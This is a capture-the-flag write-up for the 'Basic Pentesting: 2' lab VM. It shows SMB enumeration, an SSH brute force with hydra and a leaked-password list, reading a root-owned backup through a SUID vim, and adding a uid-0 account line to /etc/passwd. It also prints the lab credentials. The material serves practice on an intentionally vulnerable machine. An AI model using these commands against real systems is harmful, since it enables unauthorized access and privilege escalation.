Last updated: 15 Apr 24 09:28:30 (UTC)

Write-Up Basic-Pentest-2

Basic-Pentesting-2

By Lawcky 04/01/24

Introduction

small boot2root VM

Difficulty : easy +

Additionnal info :

Name: Basic Pentesting: 2
Release date: 10 Jul 2018
Author: Josiah Pierce
Series: Basic Pentesting

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

  • nmap
  • nikto
  • ffuf
  • enum4linux

Write-UP

attacking SMB

we know that “J” password is weak, in order to get his username we use the enum4linux
which is a smb enumeration tool

enum4linux 192.168.1.8

189854fb8273dd23431fb584fce633c0.png

“J” is Jan and “K” is kay

now we can attack ssh using jan user

sudo hydra -l jan -P /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt ssh://192.168.1.8/ -t 10 -I

dbc2ecdbf34207c892fcf2b18561dbbb.png

317824b33f1fedb382b7ce894dbfeded.png
we now have shell access to the target
jan:armando

Privilege Escalation

found a backup directory in /var/

9714e8d0b19adde00b86de5df5812260.png

all belongs to root user

we run linpeas for faster enumeration

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

chmod +x linpeas.sh

.linpeas.sh

we can access .ssh directory for the kay user

we cannot add our key to the authorized_keys but we can read it.

b6d6848ed747384ecd473f84b0c59657.png

i found 2 ways to get kay’s user:
the first one :

Crack his private ssh key using ssh2john but i couldnt use ssh2john (error i dont know how to use it + annoying)

so i wanted to do it another way and looked at the SUID

we cannot read the backup of the password of kay which is on his desktop
20ff46573020fe99610f68ce13fef877.png

yet in the SUID we find this
find / -perm -4000 2>/dev/null

cf824a281d8cd37f9e2a142fbba35115.png

by executing that binairy directly onto the backup file we are able to read it :
2f449acfb27312d578ec575f81418b5d.png

/usr/bin/vim.basic pass.bak

11512beeea08ab2b282c2c2eeebe87a1.png

kay:heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Root Escalation

i found two ways to get root very easily on this machine

the first one is the free one :

kay has all sudo privileges

74f5cf40284a4813c35b2ff72cc4ae2d.png

sudo su

the other can be done even from the jan user, since vim.basic has root SUID you can use it to overide any file on the system including the /etc/shadow and /etc/passwd file

thus we can create our own account and add it :

openssl passwd -1

/usr/bin/vim.basic /etc/passwd

and adding the line

pwn:$1$2Yu25e5L$.p/Zc8VBVgBGHow.fvVlC.:0:0:hacked:/root:/bin/bash

e94a9f4bd198ddfa379cdc90ec98d48a.png

pwn:hacked

94a901b498215ba814ddbeb844c8d444.png
got the flag

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.